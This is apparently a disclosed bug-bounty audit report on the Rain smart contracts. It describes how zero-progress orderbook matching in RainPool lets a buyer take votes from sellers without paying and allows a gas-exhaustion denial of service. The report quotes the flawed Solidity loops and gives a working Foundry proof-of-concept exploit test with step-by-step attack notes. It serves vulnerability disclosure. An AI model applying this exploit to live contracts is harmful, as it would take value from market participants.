'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Rain Disclosed Report
Audit report Rain Smart Contract Audit ContestZero-progress matching enables free vote theft and gas-based DoS in taker flows
hiddenTarget
https://github.com/hackenproof-public/rain-contracts
Vulnerability Details
Summary
Multiple orderbook matching loops in the RainPool contract contain a flaw where they can iterate through orders without making progress when the taker's remaining amount becomes insufficient to purchase minimum units at the current price tick. This creates two severe vulnerabilities: attackers can steal votes without payment when _executeSellOrder returns usedAmount == 0 but sharesReceived > 0, and denial-of-service attacks can be mounted by forcing excessive gas consumption through zero-progress scanning of artificially populated order queues.
Description
The vulnerability exists in several matching functions where loops are controlled only by amount > 0 or votes > 1 conditions without checking if the remaining amount can actually purchase minimum units at the current price tick. When a taker's residual amount becomes small due to AMM micro-steps, rounding, or truncation, the _executeSellOrder() function can return usedAmount == 0 while still transferring sharesReceived > 0 to the taker.
The affected matching loops traverse order queues at each price tick using FIFO iteration. When zero progress occurs, the loops continue visiting every order in the current price level before advancing to the next tick, without early-exit mechanisms. This behavior enables two distinct attack vectors:
Vote Theft Scenario: When _executeSellOrder() processes orders with small taker amounts relative to high tick prices (e.g., 1 unit vs 0.99e18), it can transfer votes from makers to takers without requiring corresponding base token payment. The matching loop continues processing subsequent orders in the same manner.
Gas DoS Scenario: Attackers can pre-populate order queues with numerous small but valid orders across multiple price ticks. When legitimate users attempt trading with small residual amounts, the system is forced to scan through all seeded orders without making progress, consuming excessive gas and potentially causing transaction failures.
The vulnerability affects several critical entry points including enterOption() and placeBuyOrder(), where orderbook scanning can traverse from current prices up to limits like 0.99 ether across multiple ticks.
// src/RainPool.sol:414-445 - enterOption() orderbook drain up to currentPrice
for (; head > 0 && head <= currentPrice && amount > 1; ) {
LinkedListStorage.LinkedList storage linkedList = sellOrders[
option
][head];
if (linkedList.isInitialized && !linkedList.isEmpty()) {
// iterate FIFO
idx = linkedList.first();
while (idx != linkedList.tailIndex && amount > 0) {
LinkedListStorage.Order memory order = linkedList.getData(
idx
);
idx = linkedList.next(idx);
(usedAmount, sharesReceived) = _executeSellOrder(
option,
head,
amount,
order.orderID,
msg.sender
);
amount -= usedAmount;
}
}
// advance pointer if linkedList emptied
if (linkedList.isEmpty()) {
head += TICK_SPACING;
firstSellOrderPrice[option] = head;
} else {
break;
}
}
// src/RainPool.sol:460-492 - enterOption() tick-by-tick orderbook scan (pre-endTime path)
while (amount > 0 && stoppingPrice <= 0.99 ether) {
// check orderbook now
LinkedListStorage.LinkedList storage linkedList = sellOrders[
option
][stoppingPrice];
if (linkedList.isInitialized && !linkedList.isEmpty()) {
// iterate FIFO
idx = linkedList.first();
while (idx != linkedList.tailIndex && amount > 0) {
LinkedListStorage.Order memory order = linkedList
.getData(idx);
idx = linkedList.next(idx);
(usedAmount, sharesReceived) = _executeSellOrder(
option,
stoppingPrice,
amount,
order.orderID,
msg.sender
);
amount -= usedAmount;
}
}
// advance pointer if linkedList emptied
if (linkedList.isEmpty()) {
firstSellOrderPrice[option] = stoppingPrice + TICK_SPACING;
}
unchecked {
stoppingPrice += TICK_SPACING;
}
}
// src/RainPool.sol:551-572 - enterOption() tick-by-tick orderbook scan (alternate path)
// check orderbook now
LinkedListStorage.LinkedList storage linkedList = sellOrders[
option
][stoppingPrice];
if (linkedList.isInitialized && !linkedList.isEmpty()) {
// iterate FIFO
idx = linkedList.first();
while (idx != linkedList.tailIndex && amount > 0) {
LinkedListStorage.Order memory order = linkedList
.getData(idx);
idx = linkedList.next(idx);
(usedAmount, sharesReceived) = _executeSellOrder(
option,
stoppingPrice,
amount,
order.orderID,
msg.sender
);
amount -= usedAmount;
}
}
// src/RainPool.sol:1088-1109 - placeBuyOrder() matching loop over sell orders up to limit price
uint256 head = firstSellOrderPrice[option];
for (; head <= price && amount > 1; ) {
LinkedListStorage.LinkedList storage linkedListSell = sellOrders[
option
][head];
if (!linkedListSell.isEmpty()) {
idx = linkedListSell.first();
while (idx != linkedListSell.tailIndex && amount > 0) {
LinkedListStorage.Order memory order = linkedListSell
.getData(idx);
idx = linkedListSell.next(idx);
(usedAmount, sharesReceived) = _executeSellOrder(
option,
head,
amount,
order.orderID,
msg.sender
);
amount -= usedAmount;
}
}
The vulnerability causes severe economic and operational damage through free vote theft and denial of service. Vote theft directly compromises the protocol's core economic model since votes determine payouts from winningPoolShare, allowing attackers to extract value from order makers without payment. The stuck funds issue prevents normal market operations when taker amounts cannot be fully processed. Gas-based DoS attacks can systematically prevent market participants from trading by forcing prohibitively expensive transaction costs, degrading market integrity and availability.
Validation steps
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;
import "forge-std/Test.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {RainFactory} from "../../src/RainFactory.sol";
import {RainDeployer, IRainDeployer} from "../../src/RainDeployer.sol";
import {RainPool} from "../../src/RainPool.sol";
import {OracleMock} from "../../src/mocks/OracleMock.sol";
import {ERC20Mock} from "../../src/mocks/ERC20Mock.sol";
/// @title PoC: Zero-progress orderbook scan enables gas-based DoS in placeBuyOrder/enterOption
/// @notice Demonstrates that an attacker can pre-seed many dust sell orders so that a taker call
/// scans/removes a large number of orders while making zero progress on `amount`,
/// leading to out-of-gas reverts under realistic gas limits (DoS of trading).
contract OrderbookDoS is Test {
// Core contracts
RainFactory internal rainFactory;
RainDeployer internal rainDeployer;
RainPool internal pool;
OracleMock internal oracleFactory;
// Base token (6 decimals)
ERC20Mock internal baseToken;
address internal poolOwner;
address internal resolverAI;
address internal platform;
address internal resolver;
uint256 internal constant DECIMALS = 6;
uint256 internal constant ORACLE_FIXED_FEE = 15 * (10 ** DECIMALS);
uint256 internal constant INITIAL_LIQ = 10_000_000; // 10 USDC assuming 6 decimals
function setUp() public {
// Actors
poolOwner = makeAddr("poolOwner");
resolverAI = makeAddr("resolverAI");
platform = makeAddr("platform");
resolver = makeAddr("resolver");
// Base token mock with 6 decimals
baseToken = new ERC20Mock("Base", "BASE", 0);
// Oracle factory mock (pulls reward from RainDeployer)
oracleFactory = new OracleMock(address(baseToken));
// Rain factory
rainFactory = new RainFactory();
// Deploy RainDeployer behind UUPS proxy and initialize
RainDeployer impl = new RainDeployer();
bytes memory initData = abi.encodeWithSelector(
RainDeployer.initialize.selector,
address(rainFactory),
address(oracleFactory),
address(baseToken),
platform,
resolverAI,
address(0xBEEF), // rainToken (unused in this PoC)
address(0xFEE1), // swapRouter (unused in this PoC)
uint256(DECIMALS),
uint256(12), // liquidityFee
uint256(25), // platformFee
uint256(ORACLE_FIXED_FEE),
uint256(12), // creatorFee
uint256(1) // resultResolverFee
);
ERC1967Proxy proxy = new ERC1967Proxy(address(impl), initData);
rainDeployer = RainDeployer(address(proxy));
// Prepare pool creation params
uint256[] memory liqPercent = new uint256[](2);
liqPercent[0] = 50;
liqPercent[1] = 50;
IRainDeployer.Params memory params = IRainDeployer.Params({
isPublic: false,
resolverIsAI: false,
poolOwner: poolOwner,
startTime: block.timestamp + 1,
endTime: block.timestamp + 30 minutes,
numberOfOptions: 2,
oracleEndTime: block.timestamp + 60 minutes,
ipfsUri: "ipfs://poc",
initialLiquidity: INITIAL_LIQ,
liquidityPercentages: liqPercent,
poolResolver: resolver
});
// Fund and approve creator for oracle fee + initial liquidity
baseToken.mint(address(this), ORACLE_FIXED_FEE + INITIAL_LIQ);
baseToken.approve(address(rainDeployer), type(uint256).max);
address poolAddr = rainDeployer.createPool(params);
pool = RainPool(poolAddr);
// Warp to sale live
vm.warp(params.startTime + 1);
}
// Helper: seed many small sell orders at best ask (0.99 ether tick)
function _seedDustSellOrders(uint256 n) internal {
vm.startPrank(poolOwner);
for (uint256 i = 0; i < n; i++) {
// At 0.99 ether tick, votes=1 is invalid (maker-side dust check). Use 2 votes per order.
pool.placeSellOrder(1, 0.99 ether, 2);
}
vm.stopPrank();
}
function test_FreeVoteTheft_and_GasHeavyScan() public {
// Seed a moderate number of small sell orders by the pool owner at 0.99 ether.
uint256 N = 50;
_seedDustSellOrders(N);
// Prepare victim buyer with a very small amount (2 units) at price 0.99.
address victim = makeAddr("victim");
baseToken.mint(victim, 2);
// Snapshot balances and votes before.
uint256 sellerVotesBefore = pool.userVotes(1, poolOwner);
uint256 buyerVotesBefore = pool.userVotes(1, victim);
uint256 sellerBalBefore = baseToken.balanceOf(poolOwner);
uint256 buyerBalBefore = baseToken.balanceOf(victim);
uint256 poolBalBefore = baseToken.balanceOf(address(pool));
vm.startPrank(victim);
baseToken.approve(address(pool), type(uint256).max);
pool.placeBuyOrder(1, 0.99 ether, 2);
vm.stopPrank();
// After the first full fill (2 votes -> pays 1 base unit), amount becomes 1.
// For all subsequent orders at the same tick, shareAmount=1 and usedAmount=floor(0.99)=0.
// The loop keeps iterating, transferring 1 vote from each seller order to buyer for 0 cost.
uint256 sellerVotesAfter = pool.userVotes(1, poolOwner);
uint256 buyerVotesAfter = pool.userVotes(1, victim);
uint256 sellerBalAfter = baseToken.balanceOf(poolOwner);
uint256 buyerBalAfter = baseToken.balanceOf(victim);
uint256 poolBalAfter = baseToken.balanceOf(address(pool));
// Buyer should gain at least N votes (1 free vote from many orders) plus the 2 from first order.
// Due to iteration details, we conservatively assert strictly greater than 2.
assertGt(buyerVotesAfter - buyerVotesBefore, 2, "buyer gained no free votes");
assertEq((buyerBalBefore - buyerBalAfter), 2, "buyer funds not fully transferred to pool");
// Seller receives only ~1 base unit from the first fill; others yield 0 due to truncation
// (fees may round to zero as well), so seller's received amount should be <= 1.
assertLe(sellerBalAfter - sellerBalBefore, 1, "seller unexpectedly paid");
// The pool retains at least 1 base token (stuck), since leftover amount of 1 is not escrowed nor refunded.
assertGe(poolBalAfter - poolBalBefore, 1, "pool did not retain stuck funds");
// Seller's votes decreased at least by the number of free votes acquired by buyer.
assertEq(
sellerVotesBefore - sellerVotesAfter,
buyerVotesAfter - buyerVotesBefore,
"votes not conserved across transfer"
);
}
}
- An attacker seeds many small sell orders (2 votes each) at price 0.99 ether.
- A victim places a small buy (amount = 2 base units) with limit price 0.99 ether.
- For the first sell order, 2 votes are purchased and the seller gets only 1 base unit due to integer truncation.
- Critically, for subsequent orders at the same tick, shareAmount = 1 while usedAmount = floor(1 * 0.99e18 / 1e18) = 0.
- The code transfers 1 vote per order to the buyer while paying 0 base tokens to sellers and never reducing the taker’s remaining amount.
- As a result, the buyer receives many “free votes,” the pool retains 1 base token (leftover from the initial transfer), and sellers are not paid for the votes siphoned.
Attachments
hidden 
Comments on this report are hidden 
Details hidden
Participants hidden